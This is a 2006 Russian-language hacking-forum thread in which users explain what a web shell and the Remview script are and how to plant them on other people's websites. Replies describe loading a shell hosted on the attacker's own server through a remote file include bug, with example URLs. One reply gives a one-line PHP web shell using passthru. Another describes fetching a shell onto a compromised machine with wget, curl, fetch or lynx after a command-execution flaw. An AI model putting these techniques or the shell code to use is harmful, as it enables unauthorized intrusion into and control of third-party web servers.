Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Шелл/Ремвью (https://forum.antichat.xyz/showthread.php?t=14142)

petrovich-lamer 08.02.2006 05:18
Шелл/Ремвью
 
несколько вопросов -
1) одно ли это и тоже, али нет ?
2) если АЛИ НЕТ, то был бы благодарен за любое разъяснение
3) и как можно их залить на сайт/форум ?
*не учитывая вариант со взломом админского акка и заливкой его *шелла/ремвью* через смайлы/темы и тд..

Desr0w 08.02.2006 05:27
1)Ремвью является одним их многих видов шеллов,ответ ДА.
3)Способов достаточно...
Например include баг,и ты можешь подключить свой сценарий,тоесть дать ссылу на сервер где лежит твой Ремвью.В результате чего ты сможешь залить любой шелл.
Пример:http://www.anyhost.ru/**.php?=http:/...ru/remviev.php
Есть в бажном скрипте указан что подключаемый файл *php,то просто
http://www.anyhost.ru/**.php?=http:/...rod.ru/remview
Удачи и всё такое;)

Grrl 08.02.2006 08:26
вебшелов существует множество на разных яхыках програмирования от самого банального <? passthru("$cmd"); ?> до "монстров" типа nfm и Ремвью из их числа причем не самый лучший.
залить также масса вариантов. способы зависит зависят от конкретой уязвимости ,например заливка с помошю другого более простого предварительно залитого шела того же passthru или уязвимостей типо remote command execution в этих случиях заливается с другого серва (например предварительно созданого тобой акка на халявном хосте ) с помощью какойнить установленной на атакуемой тачки качалки (wget,get,curl,fetch,lynx )узнать наличие которой можно командой which.

А вообще смотри побольше видео там всё расжованно,не важно даже если описываемая уязвимость неактуальна,научишся многому и не будешь задавать подобных вопросов.

KEZ 08.02.2006 10:37
1. на вашь вопрос ответить нельзя, т.к. ремвью - руское название скрипта а шелл - с английского оболочка
2. шелл - как уже сказал оболочка. это может быть текст в песне, слово в учебнике за 7 класс, и какой-то вид доступа к серверу. смысл шелла в том что ты можешь каким-то образом управлять сервером. например SSH-шел - это запущеный на сервере sshd демон, а у тебя вдруг есть логин и пароль. или веб-шелл. один из часто используемых скриптов для "администрирования" сайта - remview.php (Remote View). Он то и дает веб шелл (тоесть возможность выполнять команды, читать директории и файлы).
Ненадо путать слова.

petrovich-lamer 08.02.2006 16:24
хех, КЕЗ, ну я спросил для ознакомления...
терь знаю, что Шелл - это сам процесс выполнения команд (типа доступ), А ремвью - php скрипт, позволяющий реализовать такую возможность :p
так ?

KEZ 08.02.2006 20:29
Да...


Время: 04:11